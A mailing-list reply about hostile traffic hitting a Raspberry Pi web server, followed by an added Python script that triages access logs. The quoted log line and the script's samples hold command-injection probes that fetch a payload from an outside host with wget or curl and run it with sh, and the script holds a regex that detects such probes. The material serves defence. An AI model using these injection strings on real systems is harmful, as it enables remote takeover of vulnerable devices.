On 2018 Jun 21 12:40:56, you wrote to Jan Panteltje:
>> I have been watching traffic for a while now to the raspi server after I
>> posted the link, and see Russian and other countries' hackers trying
>> things, looking for a way to cause havoc:
>> 31.207.194.8 - - [21/Jun/2018:10:45:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 499 "-" "Hello, World"
AN> This is what fail2ban was made for.
there are much better solutions than fail2ban...
plus, if Jan's server does not have a vulnerable "login.cgi" file, there's
nothing to worry about in the first place...
AN> No need to fiddle with iptables.
agreed... let a proper solution do that and drop unwanted traffic at the
perimeter firewall where it deserves to be dropped... why burden the network
with unwanted traffic and burden the machine with having to run f2b... stop
unwanted traffic where it attempts to enter and don't look back ;)
)\/(ark
Always Mount a Scratch Monkey
Do you manage your own servers? If you are not running an IDS/IPS yer doin' it
wrong...
... BEER: It's not just for breakfast anymore.
---
* Origin: (1:3634/12.73)
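
Added example, not part of the original message: a small log-triage script that URL-decodes each request and separates injection probes that hit a missing script (the 404 case quoted above) from ones that reached something. The regex heuristic, the verdict names and the second and third sample lines are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)

# Heuristic (assumption): a shell separator followed by a fetch tool, or a
# shell invoked on a file in a world-writable directory.
INJECTION_RE = re.compile(
    r"[;|&`]\s*(?:wget|curl|tftp)\b|\b(?:sh|bash)\s+/(?:tmp|var/tmp|dev/shm)/",
    re.IGNORECASE,
)

def triage(line):
    """Return (host, path, verdict) for one access-log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    path, _, raw_query = m["target"].partition("?")
    # Decode before matching: the probe hides spaces and quotes as %20 / %27.
    decoded = unquote(path + "?" + raw_query)
    if not INJECTION_RE.search(decoded):
        return m["host"], path, "ignore"
    # 404 means the requested script does not exist on this server.
    verdict = "probe-miss" if m["status"] == "404" else "investigate"
    return m["host"], path, verdict

# First line is the request quoted in the message above, rejoined onto one line.
# The other two are constructed for this example (192.0.2.0/24 is a documentation range).
SAMPLE = [
    '31.207.194.8 - - [21/Jun/2018:10:45:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 499 "-" "Hello, World"',
    '192.0.2.10 - - [21/Jun/2018:10:46:02 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [21/Jun/2018:10:47:15 +0200] "GET /login.cgi?cli=x%27;curl%20http://192.0.2.99/a%7Csh%27 HTTP/1.1" 200 12 "-" "-"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(triage(entry))
```

Only the "investigate" verdict needs a human; "probe-miss" sources are candidates for a drop rule at the perimeter.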